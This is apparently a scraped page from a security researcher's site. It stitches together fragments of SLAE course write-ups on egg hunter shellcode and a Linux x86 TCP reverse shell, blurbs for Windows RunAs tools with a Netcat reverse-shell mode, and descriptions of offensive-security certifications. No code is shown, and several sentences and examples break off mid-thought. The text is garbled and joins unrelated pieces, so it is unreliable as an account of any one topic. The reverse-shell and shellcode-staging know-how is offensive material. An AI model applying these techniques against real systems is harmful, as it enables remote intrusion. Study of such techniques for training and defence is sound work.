Assignement Goals (SLAE-1530)
1) Study about the Egg Hunter shellcode.
2) Create a working demo of the Egghunter.
3) Should be configurable for different payloads.
What is an Egg Hunter Shellcode ?
An egg hunter is a very small piece of shellcode designed to find another shellcode in memory (usually a bigger one). To do so, it scans the whole process memory in search of a special pattern. This pattern is called an egg and is preceded from the the second and bigger shellcode. When an egg is found in memory, the egg hunter shellcode will redirect execution flow to the second one.
An egg is composed of 4 bytes (the size of a memory address in x86-32 processors) for example
ABCD Little Endian). We generally repeat the egg once to avoid "collisions".
Imagine if we choose
ABCD as our egg,
ABCD is a common string and we could find this pattern at multiple memory location but
ABCDABCD less likely.
ABCD is not a good choice anyway since it is too common, even if we repeat it. It is important to choose something you don't often see in programs and memory, for example
Assignment Goals (SLAE-1530)
1) Create a TCP Reverse Shellcode for Linux x86-32.
2) The port number should be easily configurable.
3) The IP address should be easily configurable.
TCP Reverse Shell Principle
In first exercise we learnt how to create our own TCP Bindshell shellcode using few syscalls (
A reverse shell is almost identical to a classic bindshell, this time instead of having a shellcode that listen for new clients, we will create a shellcode that will connect back to a remote server.
Fortunately, on Linux by default, we do not have any restrictions to manage sockets in client mode.
You can find another variant of this program which doesn't requires Networking function and also compatible with any application like Netcat, Telnet etc... here : (RunAsAttached)[https://www.phrozen.io/paper/infosec-tools/runasattached]
RunAsAttached (Local) version is more stable.
The goal of Networked version was to demonstrate inter-process communication using Socket programming.
RunAsAttached (Networked) - 32bit / 64bit
RunAsAttached is a program to run a console as another user and keep new console attached to caller console. Support reverse shell mode (Ex: Netcat)Read more...
RunAs Attached (Local) - 32bit / 64bit
Create a new application process as another Microsoft Windows user and attach its inputs / outputs (stdin, stdout, stderr) to caller console.
The new process is interactivly Attached to caller console.
RunAsAttached.exe -u -p [-d ]
Available on download sectionRead more...
RunAs (Microsoft Windows) - 32bit / 64bit.
This program is an example about how to easily run any programs as any user.
-u <username>: Launch program as defined username.
-p <password>: Password associated to username account.
-e <program>: Executable path (Ex: notepad.exe).
OSWPs are able to identify existing encryptions and vulnerabilities in 802.11 networks. They can circumvent network security restrictions and recover the encryption keys in use.
An OSCP has demonstrated the ability to use persistence, creativity, and perceptiveness to identify vulnerabilities and execute organized attacks under tight time constraints.